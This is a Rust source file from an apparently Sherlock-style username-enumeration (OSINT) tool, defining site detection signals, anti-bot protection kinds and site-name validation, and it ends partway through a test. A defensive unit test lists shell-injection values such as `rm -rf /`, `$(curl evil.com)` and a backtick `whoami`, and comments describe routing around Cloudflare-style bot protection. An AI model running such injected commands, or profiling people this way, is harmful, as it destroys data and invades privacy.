Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31/// One site we can probe for the existence of an account.
32#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34    /// Human-readable site name. Doubles as the stable filter key
35    /// (case-insensitive) used by CLI `--only` / `--exclude`.
36    pub name: String,
37    /// URL template containing a `{username}` placeholder.
38    pub url: UrlTemplate,
39    /// Ordered list of detection signals. Aggregated per the type-level docs.
40    /// Optional in source JSON when [`Site::engine`] is set — the engine's
41    /// signals are inherited at load time. After
42    /// [`crate::Registry`] resolution this vec is always non-empty (or the
43    /// site fails `validate`).
44    #[serde(default, skip_serializing_if = "Vec::is_empty")]
45    pub signals: Vec<Signal>,
46    /// One or more usernames known to exist on this site. Consumed by
47    /// `adler doctor` to verify the signal list still reports `Found`
48    /// for a real account. Accepts either a single string or an array
49    /// of strings in JSON; the doctor probes each in declaration order
50    /// and passes the present-check if **any** one of them resolves to
51    /// `Found`. Listing several is defensive — brand accounts or other
52    /// users that the site special-cases (e.g. Instagram's own
53    /// `instagram` account) shouldn't false-fail the whole site.
54    #[serde(default, skip_serializing_if = "Option::is_none")]
55    pub known_present: Option<KnownPresent>,
56    /// Username known to *not* exist on this site (optional). When omitted,
57    /// the doctor generates a random nonsense username instead.
58    #[serde(default, skip_serializing_if = "Option::is_none")]
59    pub known_absent: Option<String>,
60    /// Optional CSS-selector rules for pulling profile fields (name, bio,
61    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
62    #[serde(default, skip_serializing_if = "Vec::is_empty")]
63    pub extract: Vec<Extractor>,
64    /// Free-form classification tags for scanning a subset of the registry,
65    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
66    /// A site with no tags is universal (included unless a `--tag` filter
67    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
68    /// convention, not enforced.
69    #[serde(default, skip_serializing_if = "Vec::is_empty")]
70    pub tags: Vec<String>,
71    /// Extra HTTP headers to send with the probe (e.g.
72    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
73    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
74    /// backends apply them via `Network.setExtraHTTPHeaders` before
75    /// navigation; the raw-HTTP path doesn't read this yet.
76    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77    pub request_headers: std::collections::BTreeMap<String, String>,
78    /// Optional regular expression describing usernames a site will
79    /// accept. When set and the scanned username doesn't match, the
80    /// site is skipped (the outcome is reported as `Uncertain` with
81    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
82    /// Saves work AND avoids the false-positive class where a site
83    /// 404s on illegal usernames in ways our signal can't tell apart
84    /// from a missing account.
85    ///
86    /// Imported from Sherlock's `regexCheck` field; 95+ sites
87    /// upstream carry one (length bounds, character classes, etc.).
88    /// Validation at load time compiles the regex with `regex::Regex`
89    /// — a malformed pattern rejects the site rather than silently
90    /// degrading at scan time.
91    #[serde(default, skip_serializing_if = "Option::is_none")]
92    pub regex_check: Option<String>,
93    /// Name of a shared [`Engine`] this site inherits from (e.g.
94    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
95    /// thousands of instances with identical detection signatures;
96    /// defining the signature once on an engine and inheriting it
97    /// keeps the registry small and the cost of a platform-wide
98    /// HTML change one fix instead of hundreds.
99    ///
100    /// At [`crate::Registry::validate`] time, engine fields are
101    /// merged *under* the site's own — anything the site declares
102    /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
103    /// conflict; anything left empty / unset is filled from the
104    /// engine. An `engine: "X"` referring to a non-existent X is a
105    /// load-time error.
106    #[serde(default, skip_serializing_if = "Option::is_none")]
107    pub engine: Option<String>,
108    /// Characters the site silently drops from the username server-side
109    /// before matching — `john.doe` and `johndoe` resolve to the same
110    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
111    /// at probe time so the URL we issue matches the canonical form
112    /// the site uses, avoiding a false `NotFound` on a benign
113    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
114    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
115    #[serde(default, skip_serializing_if = "Option::is_none")]
116    pub strip_bad_char: Option<String>,
117    /// HTTP method used to probe this site. Defaults to GET — the vast
118    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
119    /// some Discord/Holopin endpoints) only answer to POST.
120    #[serde(default, skip_serializing_if = "is_default_method")]
121    pub request_method: HttpMethod,
122    /// Request body to send when [`Site::request_method`] is POST. The
123    /// literal `{username}` placeholder is substituted with the probe
124    /// username (same as URL templates). For GraphQL endpoints this
125    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
126    #[serde(default, skip_serializing_if = "Option::is_none")]
127    pub request_body: Option<String>,
128    /// Specific anti-bot mechanisms the site is known to deploy. A
129    /// richer alternative to the flat `bot-protected` tag — knowing
130    /// *which* protection a site uses lets future routing pick the
131    /// right backend (`Cloudflare` → cloudscraper-style bypass,
132    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
133    /// of the all-or-nothing `bot-protected` decision.
134    ///
135    /// Independent of [`Site::tags`]: the existing `bot-protected`
136    /// tag stays as a back-compat shorthand and routes through the
137    /// browser backend exactly as before. When this vector is
138    /// non-empty Adler also treats the site as bot-protected
139    /// regardless of the tag.
140    #[serde(default, skip_serializing_if = "Vec::is_empty")]
141    pub protection: Vec<ProtectionKind>,
142    /// Disable the site without removing it from the registry.
143    /// Disabled sites are skipped by [`crate::Registry::filter`] —
144    /// they don't get probed, don't appear in `--list-sites`, and
145    /// don't count toward the doctor's tally. Useful for parking
146    /// known-broken entries with a reason comment instead of
147    /// deleting them outright, so a future contributor can re-enable
148    /// the entry by flipping the flag once they've authored a
149    /// working signature.
150    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
151    pub disabled: bool,
152    /// Canonical-source link for mirror-style sites. When a site is
153    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
154    /// `YouTube`), `source` carries the name of the primary site this
155    /// one mirrors. Lets future UX surface "Twitter is offline,
156    /// here's the same account on Nitter" without hand-curated
157    /// linkage. Empty / `None` for canonical sites and sites with
158    /// no known mirror relationship.
159    #[serde(default, skip_serializing_if = "Option::is_none")]
160    pub source: Option<String>,
161    /// Approximate popularity rank — lower numbers are more popular.
162    /// Used by `adler --top N` to scan only the most-popular N sites
163    /// (useful for fast checks of high-signal targets). Ranks are
164    /// curated, not derived from traffic data: the seed set covers
165    /// well-known OSINT-relevant sites where most users have
166    /// accounts. Sites without a rank are skipped by `--top N`.
167    #[serde(default, skip_serializing_if = "Option::is_none")]
168    pub popularity: Option<u32>,
169}
170
171/// A specific anti-bot mechanism a site is known to deploy. Used to
172/// route probes to the right backend (raw HTTP, cloudscraper, full
173/// browser) and to inform users what blocks reliable detection.
174#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
175#[serde(rename_all = "kebab-case")]
176#[non_exhaustive]
177pub enum ProtectionKind {
178    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
179    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
180    /// (e.g. `FlareSolverr`) without a full browser.
181    Cloudflare,
182    /// AWS `CloudFront` edge protection. Often UA-strictness only.
183    Cloudfront,
184    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
185    /// challenge model to Cloudflare.
186    DdosGuard,
187    /// Cloudflare's JS-challenge ("I am under attack" mode).
188    /// Needs a JS-executing backend.
189    CfJsChallenge,
190    /// Cloudflare's WAF firewall blocking by signature, requiring
191    /// a real browser fingerprint to clear.
192    CfFirewall,
193    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
194    /// client by its TLS handshake shape, not its UA).
195    TlsFingerprint,
196    /// `Anubis` proof-of-work challenge. Used by codeberg + a
197    /// growing number of FOSS projects to discourage scraping.
198    Anubis,
199    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
200    /// always blocking — `Uncertain` is the honest answer.
201    Captcha,
202    /// Trivial UA-strictness: rejects unknown User-Agent strings
203    /// but lets through a real-browser UA. Cheapest to bypass.
204    UserAgent,
205    /// Endpoint requires authentication; no anonymous probe path
206    /// exists. Practically unscrapable for OSINT.
207    UserAuth,
208}
209
210/// HTTP method used to probe a site. Only GET and POST are supported.
211#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
212#[serde(rename_all = "UPPERCASE")]
213pub enum HttpMethod {
214    /// Standard GET — the default for ~99% of sites in the registry.
215    #[default]
216    Get,
217    /// POST — for API endpoints that only differentiate accounts via a
218    /// body payload (GraphQL queries, form submissions). Pair with
219    /// [`Site::request_body`].
220    Post,
221}
222
223/// serde's `skip_serializing_if` callback contract requires a
224/// reference, so the by-value lint on a 1-byte type doesn't apply.
225#[allow(clippy::trivially_copy_pass_by_ref)]
226fn is_default_method(m: &HttpMethod) -> bool {
227    matches!(m, HttpMethod::Get)
228}
229
230/// Shared detection signature template for a family of sites that
231/// run the same forum / blog / wiki software (Discourse, vBulletin,
232/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
233///
234/// Engines carry the same kinds of fields as a [`Site`] does (just
235/// the inheritable ones — there's no per-engine `url`, that comes
236/// from the site itself). At registry load, the engine's fields
237/// are merged *under* each referring site's own fields: site wins
238/// on conflict.
239#[derive(Debug, Clone, Default, Serialize, Deserialize)]
240#[non_exhaustive]
241pub struct Engine {
242    /// Default detection signals for sites of this family.
243    /// Inherited only when the site itself declares no `signals`.
244    #[serde(default, skip_serializing_if = "Vec::is_empty")]
245    pub signals: Vec<Signal>,
246    /// Default extra HTTP headers (e.g. a User-Agent that the
247    /// platform accepts where the browser default gets blocked).
248    /// Merged with the site's own headers; site wins per-key.
249    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
250    pub request_headers: std::collections::BTreeMap<String, String>,
251    /// Default username-validity regex inherited only when the site
252    /// itself doesn't declare one.
253    #[serde(default, skip_serializing_if = "Option::is_none")]
254    pub regex_check: Option<String>,
255}
256
257impl Engine {
258    /// Compile-check the engine's own constraints — the inheritable
259    /// fields are subject to the same validation as a site's would
260    /// be.
261    ///
262    /// # Errors
263    /// Returns [`Error::InvalidSite`] when the engine name is
264    /// empty, a signal carries an empty marker, or any other
265    /// constraint a [`Site::validate`] would also flag.
266    pub fn validate(&self, name: &str) -> Result<()> {
267        if name.trim().is_empty() {
268            return Err(Error::InvalidSite {
269                reason: "engine name is empty".into(),
270            });
271        }
272        for signal in &self.signals {
273            signal.validate().map_err(|reason| Error::InvalidSite {
274                reason: format!("engine {name:?}: {reason}"),
275            })?;
276        }
277        if let Some(pat) = &self.regex_check {
278            if let Err(err) = regex::Regex::new(pat) {
279                // The Rust `regex` crate refuses look-around for DoS
280                // reasons; some upstream registries (Sherlock, WMN)
281                // ship patterns that need it. Downgraded from WARN to
282                // DEBUG: it's a known structural limit, the probe
283                // path falls back gracefully, and the noise dominated
284                // CLI startup.
285                tracing::debug!(
286                    engine = %name, pattern = %pat, error = %err,
287                    "engine regex_check did not compile; gate disabled for inheriting sites",
288                );
289            }
290        }
291        Ok(())
292    }
293
294    /// Fill the inheritable empty / unset fields of `site` from
295    /// this engine. Site fields are authoritative: if the site has
296    /// any signals at all, no engine signals are merged in.
297    /// `request_headers` merge per-key (site wins on per-key
298    /// conflict).
299    pub fn merge_into(&self, site: &mut Site) {
300        if site.signals.is_empty() {
301            site.signals.clone_from(&self.signals);
302        }
303        for (k, v) in &self.request_headers {
304            site.request_headers
305                .entry(k.clone())
306                .or_insert_with(|| v.clone());
307        }
308        if site.regex_check.is_none() {
309            site.regex_check.clone_from(&self.regex_check);
310        }
311    }
312}
313
314/// Known-present declaration on a [`Site`].
315///
316/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
317/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
318/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
319/// the site was authored with, so single-username entries stay
320/// compact.
321#[derive(Debug, Clone, Serialize, Deserialize)]
322#[serde(untagged)]
323#[non_exhaustive]
324pub enum KnownPresent {
325    /// Exactly one candidate username.
326    Single(String),
327    /// Two or more candidate usernames. Doctor passes if any resolve
328    /// to `Found`.
329    Multiple(Vec<String>),
330}
331
332impl KnownPresent {
333    /// View all candidate usernames as a slice, in declaration order.
334    /// Always non-empty for `Single`; may be empty for a hand-authored
335    /// `Multiple([])` (validation rejects that).
336    pub fn as_slice(&self) -> &[String] {
337        match self {
338            Self::Single(s) => std::slice::from_ref(s),
339            Self::Multiple(v) => v.as_slice(),
340        }
341    }
342
343    /// Primary candidate — the first declared username. `Single`
344    /// always has one; `Multiple` may be empty if a contributor wrote
345    /// `[]` (caught by [`Site::validate`]).
346    pub fn primary(&self) -> Option<&str> {
347        self.as_slice().first().map(String::as_str)
348    }
349}
350
351impl From<&str> for KnownPresent {
352    fn from(s: &str) -> Self {
353        Self::Single(s.to_owned())
354    }
355}
356
357impl From<String> for KnownPresent {
358    fn from(s: String) -> Self {
359        Self::Single(s)
360    }
361}
362
/// Maximum length allowed for a site name. Names are rendered in CLI
/// output, in CSV columns, and in the run-summary table of the
/// validate-sites.yml workflow, so a short cap prevents both UI
/// breakage and pathological CI artefacts.
const NAME_MAX_LEN: usize = 80;
368
/// Report whether `name` is limited to characters that are safe to
/// interpolate into shell, CSV, and CLI argument contexts. Equivalent
/// to the JSON Schema pattern `^[\w][\w .()!/+-]*$`.
///
/// The first character must be an ASCII letter, digit, or `_`; later
/// characters may additionally be a space or one of `.()!/+-`. The
/// empty string is rejected.
fn is_safe_site_name(name: &str) -> bool {
    /// Non-word characters allowed anywhere except the first position.
    const EXTRAS: [char; 8] = [' ', '.', '(', ')', '!', '/', '+', '-'];

    let is_word = |c: char| c == '_' || c.is_ascii_alphanumeric();

    !name.is_empty()
        && name
            .chars()
            .enumerate()
            .all(|(position, c)| is_word(c) || (position > 0 && EXTRAS.contains(&c)))
}
385
386/// A rule for extracting one profile field from a page.
387#[derive(Debug, Clone, Serialize, Deserialize)]
388pub struct Extractor {
389    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
390    pub field: String,
391    /// CSS selector locating the element.
392    pub selector: String,
393    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
394    /// element's trimmed text content is used.
395    #[serde(default, skip_serializing_if = "Option::is_none")]
396    pub attr: Option<String>,
397}
398
399impl Site {
400    /// Render the site URL for a given username.
401    ///
402    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
403    /// those characters are removed from `username` before
404    /// substitution — so a `john.doe` probe against a site that
405    /// lists `strip_bad_char: "."` actually hits the URL for
406    /// `johndoe`, matching the canonical form the site stores
407    /// internally.
408    pub fn url_for(&self, username: &Username) -> String {
409        let raw = username.as_str();
410        match self.strip_bad_char.as_deref() {
411            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
412                let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
413                self.url.substitute(&stripped)
414            }
415            _ => self.url.substitute(raw),
416        }
417    }
418
419    /// Validate semantic invariants the type system can't enforce
420    /// (empty signals list, empty markers, empty status code sets).
421    pub fn validate(&self) -> Result<()> {
422        if self.name.trim().is_empty() {
423            return Err(Error::InvalidSite {
424                reason: "site name is empty".into(),
425            });
426        }
427        // Site names doubled as shell-interpolation values in the
428        // `validate-sites.yml` PR gate; an unsanitised name like
429        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
430        // quoting and run arbitrary commands on the runner. Both the
431        // JSON Schema and this Rust loader enforce a safe character
432        // class (word chars plus a few visual punctuation marks) at
433        // every entry point.
434        if self.name.len() > NAME_MAX_LEN {
435            return Err(Error::InvalidSite {
436                reason: format!(
437                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
438                    self.name
439                ),
440            });
441        }
442        if !is_safe_site_name(&self.name) {
443            return Err(Error::InvalidSite {
444                reason: format!(
445                    "site name {:?} contains characters outside the allowed \
446                     set (word chars, space, `.()!/+-`)",
447                    self.name
448                ),
449            });
450        }
451        if self.signals.is_empty() {
452            return Err(Error::InvalidSite {
453                reason: format!("site {:?}: signals list is empty", self.name),
454            });
455        }
456        for signal in &self.signals {
457            signal.validate().map_err(|reason| Error::InvalidSite {
458                reason: format!("site {:?}: {reason}", self.name),
459            })?;
460        }
461        for extractor in &self.extract {
462            if extractor.field.trim().is_empty() {
463                return Err(Error::InvalidSite {
464                    reason: format!("site {:?}: extractor has an empty field name", self.name),
465                });
466            }
467            if scraper::Selector::parse(&extractor.selector).is_err() {
468                return Err(Error::InvalidSite {
469                    reason: format!(
470                        "site {:?}: invalid CSS selector {:?} for field {:?}",
471                        self.name, extractor.selector, extractor.field
472                    ),
473                });
474            }
475        }
476        if let Some(pat) = &self.regex_check {
477            if let Err(err) = regex::Regex::new(pat) {
478                // Sherlock's regexes occasionally use lookarounds
479                // (e.g. `(?![.-])`), which the Rust `regex` crate
480                // doesn't support — it's a true regular-language
481                // engine for performance + DoS safety. Rather than
482                // reject the whole site over a username-gate the
483                // probe path will simply skip and let the site keep
484                // working at the cost of one wasted probe per
485                // illegal username. Logged at DEBUG (not WARN) — it's
486                // a known structural limit, ~8 sites in the embedded
487                // registry need look-around. The noise dominated CLI
488                // startup; set `ADLER_LOG=debug` to see them again.
489                tracing::debug!(
490                    site = %self.name, pattern = %pat, error = %err,
491                    "regex_check did not compile; username-gate disabled for this site",
492                );
493            }
494        }
495        if let Some(kp) = &self.known_present {
496            if kp.as_slice().is_empty() {
497                return Err(Error::InvalidSite {
498                    reason: format!("site {:?}: known_present is an empty list", self.name),
499                });
500            }
501            for name in kp.as_slice() {
502                if name.trim().is_empty() {
503                    return Err(Error::InvalidSite {
504                        reason: format!(
505                            "site {:?}: known_present contains an empty username",
506                            self.name
507                        ),
508                    });
509                }
510            }
511        }
512        for tag in &self.tags {
513            if tag.trim().is_empty() {
514                return Err(Error::InvalidSite {
515                    reason: format!("site {:?}: tag is empty", self.name),
516                });
517            }
518        }
519        Ok(())
520    }
521}
522
/// A profile URL with a `{username}` placeholder in it.
///
/// Construction validates the string: it has to contain the
/// placeholder and begin with `http://` or `https://`.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
529
/// Literal marker in a URL template that gets replaced by the probe
/// username.
const PLACEHOLDER: &str = "{username}";
531
532impl UrlTemplate {
533    /// Build a template, validating placeholder and scheme.
534    pub fn new(template: impl Into<String>) -> Result<Self> {
535        let t = template.into();
536        if !t.contains(PLACEHOLDER) {
537            return Err(Error::InvalidSite {
538                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
539            });
540        }
541        if !(t.starts_with("http://") || t.starts_with("https://")) {
542            return Err(Error::InvalidSite {
543                reason: format!("url template must start with http(s)://: {t:?}"),
544            });
545        }
546        Ok(Self(t))
547    }
548
549    fn substitute(&self, username: &str) -> String {
550        self.0.replace(PLACEHOLDER, username)
551    }
552
553    /// Borrow the raw template (with placeholder).
554    pub fn as_str(&self) -> &str {
555        &self.0
556    }
557}
558
559impl fmt::Display for UrlTemplate {
560    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
561        f.write_str(&self.0)
562    }
563}
564
565impl Serialize for UrlTemplate {
566    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
567        self.0.serialize(s)
568    }
569}
570
571impl<'de> Deserialize<'de> for UrlTemplate {
572    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
573        let raw = String::deserialize(d)?;
574        Self::new(raw).map_err(serde::de::Error::custom)
575    }
576}
577
578/// A single piece of evidence about whether an account exists.
579///
580/// Signals are tagged in JSON by their `kind`. New variants will land for
581/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
582/// adding variants is not a breaking change.
583#[derive(Debug, Clone, Serialize, Deserialize)]
584#[serde(tag = "kind", rename_all = "snake_case")]
585#[non_exhaustive]
586pub enum Signal {
587    /// Votes **`Found`** when the response status is in `codes`.
588    StatusFound {
589        /// Status codes that vote for existence. Must be non-empty.
590        codes: Vec<u16>,
591    },
592    /// Votes **`NotFound`** when the response status is in `codes`.
593    StatusNotFound {
594        /// Status codes that vote for non-existence. Must be non-empty.
595        codes: Vec<u16>,
596    },
597    /// Votes **`Found`** when the response body contains `text`.
598    BodyPresent {
599        /// Substring whose appearance votes for existence. Must be non-empty.
600        text: String,
601    },
602    /// Votes **`NotFound`** when the response body contains `text`.
603    BodyAbsent {
604        /// Substring whose appearance votes for non-existence (e.g.
605        /// `"Profile not found"`). Must be non-empty.
606        text: String,
607    },
608    /// Votes **`NotFound`** when the final URL (post-redirect) contains
609    /// `fragment`.
610    RedirectAbsent {
611        /// Substring that, when present in the final URL, indicates the
612        /// account is missing (typically `"/login"` or `"/404"`). Must be
613        /// non-empty.
614        fragment: String,
615    },
616}
617
/// The parts of an HTTP response that each [`Signal`] is evaluated
/// against.
///
/// Detection plumbing internal to the crate; not public API.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// Status code of the HTTP response.
    pub(crate) status: u16,
    /// URL the request ended up at once redirects were followed.
    pub(crate) final_url: &'a str,
    /// Decoded body of the response. Left as an empty string when no
    /// configured signal inspects the body.
    pub(crate) body: &'a str,
}
630
/// The vote a single signal casts after inspecting a probe.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// The signal fired in favour of the account existing.
    Found,
    /// The signal fired in favour of the account not existing.
    NotFound,
    /// The signal's trigger condition did not match, so it abstains.
    Ambiguous,
}
641
642impl Signal {
643    /// True if this signal needs to inspect the response body. Used by the
644    /// client to skip body reads when no signal requires them.
645    pub(crate) fn needs_body(&self) -> bool {
646        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
647    }
648
649    /// Evaluate this signal against a probe and produce a vote.
650    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
651        match self {
652            Self::StatusFound { codes } => {
653                if codes.contains(&probe.status) {
654                    SignalVerdict::Found
655                } else {
656                    SignalVerdict::Ambiguous
657                }
658            }
659            Self::StatusNotFound { codes } => {
660                if codes.contains(&probe.status) {
661                    SignalVerdict::NotFound
662                } else {
663                    SignalVerdict::Ambiguous
664                }
665            }
666            Self::BodyPresent { text } => {
667                if probe.body.contains(text.as_str()) {
668                    SignalVerdict::Found
669                } else {
670                    SignalVerdict::Ambiguous
671                }
672            }
673            Self::BodyAbsent { text } => {
674                if probe.body.contains(text.as_str()) {
675                    SignalVerdict::NotFound
676                } else {
677                    SignalVerdict::Ambiguous
678                }
679            }
680            Self::RedirectAbsent { fragment } => {
681                if probe.final_url.contains(fragment.as_str()) {
682                    SignalVerdict::NotFound
683                } else {
684                    SignalVerdict::Ambiguous
685                }
686            }
687        }
688    }
689
690    /// Human-readable description of why this signal fired against `probe`,
691    /// for verdict explainability. Only meaningful for a signal that voted
692    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
693    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
694        match self {
695            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
696            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
697            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
698            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
699            Self::RedirectAbsent { fragment } => {
700                format!("final URL contains {fragment:?} (redirect_absent)")
701            }
702        }
703    }
704
705    fn validate(&self) -> std::result::Result<(), String> {
706        match self {
707            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
708                if codes.is_empty() {
709                    return Err("status signal codes list is empty".into());
710                }
711            }
712            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
713                if text.is_empty() {
714                    return Err("body signal text is empty".into());
715                }
716            }
717            Self::RedirectAbsent { fragment } => {
718                if fragment.is_empty() {
719                    return Err("redirect signal fragment is empty".into());
720                }
721            }
722        }
723        Ok(())
724    }
725}
726
727/// Aggregate per-signal verdicts into a final [`MatchKind`].
728///
729/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
730/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
731/// docs for why a `NotFound` vote outranks a `Found` vote.
732pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
733where
734    I: IntoIterator<Item = SignalVerdict>,
735{
736    let mut found = false;
737    let mut not_found = false;
738    for v in verdicts {
739        match v {
740            SignalVerdict::Found => found = true,
741            SignalVerdict::NotFound => not_found = true,
742            SignalVerdict::Ambiguous => {}
743        }
744    }
745    if not_found {
746        MatchKind::NotFound
747    } else if found {
748        MatchKind::Found
749    } else {
750        MatchKind::Uncertain
751    }
752}
753
// Unit tests for site validation, URL templating, per-signal evaluation,
// match descriptions, and verdict aggregation.
#[cfg(test)]
mod tests {
    use super::*;

    /// Build a [`Site`] named "Example" at `https://example.com/{username}`
    /// carrying `signals`, with every other field set to an empty / `None` /
    /// `false` value (and the GET method) so each test only overrides what it
    /// is exercising.
    fn site_with(signals: Vec<Signal>) -> Site {
        Site {
            name: "Example".into(),
            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
            signals,
            known_present: None,
            known_absent: None,
            extract: Vec::new(),
            tags: Vec::new(),
            request_headers: std::collections::BTreeMap::new(),
            regex_check: None,
            engine: None,
            strip_bad_char: None,
            request_method: crate::site::HttpMethod::Get,
            request_body: None,
            protection: Vec::new(),
            disabled: false,
            source: None,
            popularity: None,
        }
    }

    #[test]
    fn url_template_substitutes_placeholder() {
        let user = Username::new("alice").unwrap();
        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        assert_eq!(site.url_for(&user), "https://example.com/alice");
    }

    #[test]
    fn url_for_strips_bad_chars_before_substitution() {
        let user = Username::new("john.doe").unwrap();
        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        site.strip_bad_char = Some(".".into());
        assert_eq!(site.url_for(&user), "https://example.com/johndoe");
    }

    #[test]
    fn url_for_strip_bad_char_noop_when_no_match() {
        let user = Username::new("alice").unwrap();
        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        site.strip_bad_char = Some(".".into());
        assert_eq!(site.url_for(&user), "https://example.com/alice");
    }

    #[test]
    fn url_template_rejects_missing_placeholder() {
        assert!(UrlTemplate::new("https://example.com/users/").is_err());
    }

    #[test]
    fn url_template_rejects_bad_scheme() {
        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
    }

    #[test]
    fn validate_requires_non_empty_signals() {
        let err = site_with(vec![]).validate().unwrap_err();
        assert!(err.to_string().contains("signals list is empty"));
    }

    #[test]
    fn validate_rejects_empty_status_codes() {
        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
            .validate()
            .unwrap_err();
        assert!(err.to_string().contains("status signal"));
    }

    #[test]
    fn validate_rejects_empty_body_text() {
        let err = site_with(vec![Signal::BodyAbsent {
            text: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("body signal"));
    }

    #[test]
    fn validate_rejects_empty_redirect_fragment() {
        let err = site_with(vec![Signal::RedirectAbsent {
            fragment: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("redirect signal"));
    }

    #[test]
    fn validate_rejects_shell_metacharacters_in_name() {
        // The validate-sites.yml workflow used to inject `--only "$name"`
        // where `$name` came from PR-controlled sites.json. A name like
        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
        // and executed on the runner. Schema + this loader both enforce
        // a safe character class; verify a representative selection of
        // dangerous chars is rejected.
        for bad in [
            "Foo\"; rm -rf /; #",
            "Bar$(curl evil.com)",
            "Baz`whoami`",
            "Qux\\nfoo",
            "back\\slash",
            "pipe|ish",
            "semi;colon",
            "amp&and",
            "lt<gt>",
        ] {
            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
            s.name = bad.into();
            let err = s.validate().unwrap_err();
            assert!(
                err.to_string()
                    .contains("characters outside the allowed set"),
                "expected unsafe-name rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_accepts_real_world_site_names() {
        // Cross-check the validation against names we actually ship.
        for ok in [
            "GitHub",
            "Steam Community (User)",
            "X / Twitter",
            "osu!",
            "Eintracht Frankfurt Forum",
            "Archive of Our Own",
            "Career.habr",
            "fl",
            "GitLab.com",
            "Sbazar.cz",
        ] {
            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
            s.name = ok.into();
            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
        }
    }

    #[test]
    fn validate_rejects_overlong_name() {
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
